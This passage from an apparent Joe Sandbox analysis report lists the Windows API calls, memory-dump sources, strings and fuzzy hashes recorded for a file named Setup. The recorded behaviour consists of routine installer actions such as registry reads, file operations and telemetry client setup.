                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Installed$System\WPA\ApplianceServer
                                                                                              • API String ID: 3677997916-2615809295
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?,?,?,63967BC3,?,C0000000,00000000), ref: 63967EA6
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 63967EB6
                                                                                              • CreateFileW.KERNEL32(00002100,00000002,00000000,C0000000,?,63967BC3,00000000,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?), ref: 63967EF3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              • String ID: CreateFileTransactedW$kernel32.dll
                                                                                              • API String ID: 2580138172-2053874626
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtQueryInformationProcess), ref: 6C5EA7DB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA7E2
                                                                                              • GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 6C5EA7F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                                              • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                              • API String ID: 4190356694-2906145389
                                                                                              APIs
                                                                                              Strings
                                                                                              • IDS_FILE_VERIFICATION_PROGRESS_STATUS, xrefs: 63959AF7
                                                                                              • IDS_DOWNLOAD_SUCCESS, xrefs: 63959B02
                                                                                              • IDS_FILE_VERIFICATION_SUCCESS, xrefs: 63959AF0
                                                                                              • IDS_DOWNLOAD_PROGRESS_STATUS, xrefs: 63959B09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: IDS_DOWNLOAD_PROGRESS_STATUS$IDS_DOWNLOAD_SUCCESS$IDS_FILE_VERIFICATION_PROGRESS_STATUS$IDS_FILE_VERIFICATION_SUCCESS
                                                                                              • API String ID: 431132790-1342741052
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000001,?), ref: 6C5EA865
                                                                                              • RegQueryValueExA.ADVAPI32(?,ServerAdminUI,00000000,00000000,00000000,?), ref: 6C5EA88A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA893
                                                                                              Strings
                                                                                              • ServerAdminUI, xrefs: 6C5EA87B
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 6C5EA85B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: ServerAdminUI$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                              • API String ID: 3677997916-377279143
                                                                                              APIs
                                                                                                • Part of subcall function 6C5DC33D: GetLastError.KERNEL32(6C5F0088,?,6C5DC203,?,?,?,00000000), ref: 6C5DC343
                                                                                                • Part of subcall function 6C5DC33D: SetLastError.KERNEL32(00000000,?,6C5DC203,?,?,?,00000000), ref: 6C5DC354
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5E378C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000), ref: 6C5E3824
                                                                                              • SystemTimeToFileTime.KERNEL32(?,6C5DC008,?,?,?,?,6C5DC008,00000000), ref: 6C5E3852
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6C5DC008,00000000), ref: 6C5E386E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Time$FileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3446928799-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: StringVariant$AllocClearFreeH_prolog3Init
                                                                                              • String ID:
                                                                                              • API String ID: 1692324188-0
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E6538
                                                                                              • GetLastError.KERNEL32 ref: 6C5E659B
                                                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,00000000,UserId,?), ref: 6C5E65FA
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$MessageTracememset
                                                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                                                              • API String ID: 1733364027-3032788761
                                                                                              APIs
                                                                                              • DestroyPropertySheetPage.COMCTL32(?,00000000), ref: 639626C1
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000000), ref: 639626FE
                                                                                              • CreatePropertySheetPageW.COMCTL32(?,00000000,00000000), ref: 63962716
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 63962735
                                                                                              • DestroyPropertySheetPage.COMCTL32(00000000), ref: 63962751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: PagePropertySheet$Destroy$CreateExceptionMessageRaiseSend
                                                                                              • String ID:
                                                                                              • API String ID: 1284076499-0
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C5F0168,00000FA0,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D268E
                                                                                              • GetLastError.KERNEL32(?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5DF520
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                              • SetLastError.KERNEL32(00000000,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D26D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CountCriticalInitializeSectionSpinmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2914686227-0
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DBCF7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,6C5D0000), ref: 6C5DBD0C
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,6C5D0000), ref: 6C5DBD21
                                                                                              • GetLastError.KERNEL32(?,?,6C5D0000), ref: 6C5DF94F
                                                                                              • GetLastError.KERNEL32(?,?,6C5D0000), ref: 6C5DF98C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileLibraryLoadModuleNamememset
                                                                                              • String ID:
                                                                                              • API String ID: 2354241510-0
                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395C1C2
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 6395C1CD
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 6395C1F7
                                                                                              • GetParent.USER32(?), ref: 6395C206
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,6395C10E,00000110), ref: 6395C22D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionItemMessageParentRaiseSendTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3396959766-0
                                                                                              • Opcode ID: 82625cb1ba374030e7598c42025de069df9d76abeedf4538fcf63cc5591278ad
                                                                                              • Instruction ID: c94213a8ef8fef3a267f386683c9914411382fec196ef0c7fe5649804c546681
                                                                                              • Opcode Fuzzy Hash: 82625cb1ba374030e7598c42025de069df9d76abeedf4538fcf63cc5591278ad
                                                                                              • Instruction Fuzzy Hash: 9211E331904304BFD721EFA5DC84D5BBBE9EF4ABA8B104429F546C6520DB71E861CF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395CB28
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB50
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB5D
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB6A
                                                                                              • DestroyIcon.USER32(?,00000004), ref: 6395CB77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyIcon$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 1886938828-0
                                                                                              • Opcode ID: 750ca209e26651086657919455be3f9a6c2fda48d1b171175055ec1d4aa040c2
                                                                                              • Instruction ID: 8e462afd6e0a52b0b423bc32b2a4f3a6ae711582cf57da6a3505ca24d14a264e
                                                                                              • Opcode Fuzzy Hash: 750ca209e26651086657919455be3f9a6c2fda48d1b171175055ec1d4aa040c2
                                                                                              • Instruction Fuzzy Hash: 0F115B70B00706ABEB14DF74C944B9AB7BCBF11B68F040619B528D7281CB74E960CFA1
                                                                                              APIs
                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 63960415
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6396042B
                                                                                              • TranslateMessage.USER32(?), ref: 63960435
                                                                                              • DispatchMessageW.USER32(?), ref: 6396043F
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6396044E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                              • String ID:
                                                                                              • API String ID: 2015114452-0
                                                                                              • Opcode ID: d82c0db18feb3e347e39beb79bca041cd785a076aa64f2e81fa06f584a186b15
                                                                                              • Instruction ID: 9404b134be5dca0310dcd51cf40793baa22303602b895408f124e36f2ecf7be3
                                                                                              • Opcode Fuzzy Hash: d82c0db18feb3e347e39beb79bca041cd785a076aa64f2e81fa06f584a186b15
                                                                                              • Instruction Fuzzy Hash: FF017572806229BBDF20A6E18C48DDF7A7CEF477A4F040115F611E6180E674D115CAB0
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6C5E4788
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6C5E4794
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6C5E479C
                                                                                              • GetTickCount.KERNEL32 ref: 6C5E47A4
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C5E47B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: d2ce4d1d4aafe385bb4d7c934168c0b9dfb31bc228f5e316c95f4b74cad54e6b
                                                                                              • Instruction ID: 79b44dff11d330707cabf245e9621970115b845926f33cff5c940e0f83e3d5b0
                                                                                              • Opcode Fuzzy Hash: d2ce4d1d4aafe385bb4d7c934168c0b9dfb31bc228f5e316c95f4b74cad54e6b
                                                                                              • Instruction Fuzzy Hash: 3701ED76E002249BCF119BF9DC48A9AB7F8FB4E255F974955D811E7104D730A9408F88
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394C287
                                                                                                • Part of subcall function 6394C224: __EH_prolog3.LIBCMT ref: 6394C22B
                                                                                              • OutputDebugStringW.KERNEL32(?,?,?,00000008,6394C856), ref: 6394C2A8
                                                                                                • Part of subcall function 6396807A: SysFreeString.OLEAUT32(00000000), ref: 63968087
                                                                                                • Part of subcall function 6396807A: SysAllocString.OLEAUT32(00000000), ref: 63968096
                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,00000008,6394C856), ref: 6394C2CF
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 6394C2DC
                                                                                              • LocalFree.KERNEL32(?,?), ref: 6394C2ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$DebugFreeH_prolog3Output$AllocFormatLocalMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3239379132-0
                                                                                              • Opcode ID: a3a83d05e5636f6b6df9ac55a0a98b0802feae5acf2192cc589c79ee498da7ef
                                                                                              • Instruction ID: 959cb022d6b04331a7d7a8f4325c6bb896df6de7d13e6591f485069b874d5de5
                                                                                              • Opcode Fuzzy Hash: a3a83d05e5636f6b6df9ac55a0a98b0802feae5acf2192cc589c79ee498da7ef
                                                                                              • Instruction Fuzzy Hash: E7015A70D1420AEFEF14ABE0CC04AAF7A78BF16B05B104525F511B51A1DB71DA10CF20
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,63950FC5,205ABF9D), ref: 63967BFB
                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,63950FC5,205ABF9D), ref: 63967C0E
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,?,63950FC5,205ABF9D), ref: 63967C1E
                                                                                              • GetLastError.KERNEL32(?,63950FC5,205ABF9D), ref: 63967C28
                                                                                              • MoveFileW.KERNEL32(?,00000000), ref: 63967C41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$CloseErrorHandleLastMove
                                                                                              • String ID:
                                                                                              • API String ID: 4022683281-0
                                                                                              • Opcode ID: ac6a17239fc4e4f1f38b5103b0b37a3a6ad1335d7c780b8a132dc8db858f1fea
                                                                                              • Instruction ID: 8f726ec3dbdee80d2b88ad49edaa6e4c0f77d9a727d6e0f8ec50a495c26a70ed
                                                                                              • Opcode Fuzzy Hash: ac6a17239fc4e4f1f38b5103b0b37a3a6ad1335d7c780b8a132dc8db858f1fea
                                                                                              • Instruction Fuzzy Hash: AEF0303190A2149FEB113F65C808B8A3BADDF53B9AB040425F949D5201EB39C5A08EA6
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 6396E61B
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 6396E632
                                                                                              • __amsg_exit.LIBCMT ref: 6396E640
                                                                                              • __lock.LIBCMT ref: 6396E650
                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 6396E664
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                              • String ID:
                                                                                              • API String ID: 938513278-0
                                                                                              • Opcode ID: 4767a5aeef15f637e83bbf81c99454771d4a54446150dce21ee93769433ddede
                                                                                              • Instruction ID: 025aa6680902e54811d619d2b131676925d460fb9a657f475979df697dd3bd4a
                                                                                              • Opcode Fuzzy Hash: 4767a5aeef15f637e83bbf81c99454771d4a54446150dce21ee93769433ddede
                                                                                              • Instruction Fuzzy Hash: 5CF09032D4B720EBFB21BB788E0174E72A4AF17FA8F145109E411AB1C0CF24C940CE99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr
                                                                                              • String ID: ::$DATA$\\?\$\\?\UNC\
                                                                                              • API String ID: 1497570035-1379090233
                                                                                              • Opcode ID: 708d7fdbf48c63ec3293fdfa6da75fd200c3125cde27cc0101cd85e88019c8bd
                                                                                              • Instruction ID: d7dc22e0a913087aa8f2223040e7d53fb483ad54ef8188317eb5397c04f6856a
                                                                                              • Opcode Fuzzy Hash: 708d7fdbf48c63ec3293fdfa6da75fd200c3125cde27cc0101cd85e88019c8bd
                                                                                              • Instruction Fuzzy Hash: 1FD1D271C01309EACF20EF56CC40A9E77B5FF4835AF548516E8659BD50E3B4DA80CB99
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639660AF
                                                                                                • Part of subcall function 63967341: __EH_prolog3.LIBCMT ref: 63967348
                                                                                                • Part of subcall function 63967341: GetLastError.KERNEL32 ref: 63967364
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 639662D8
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
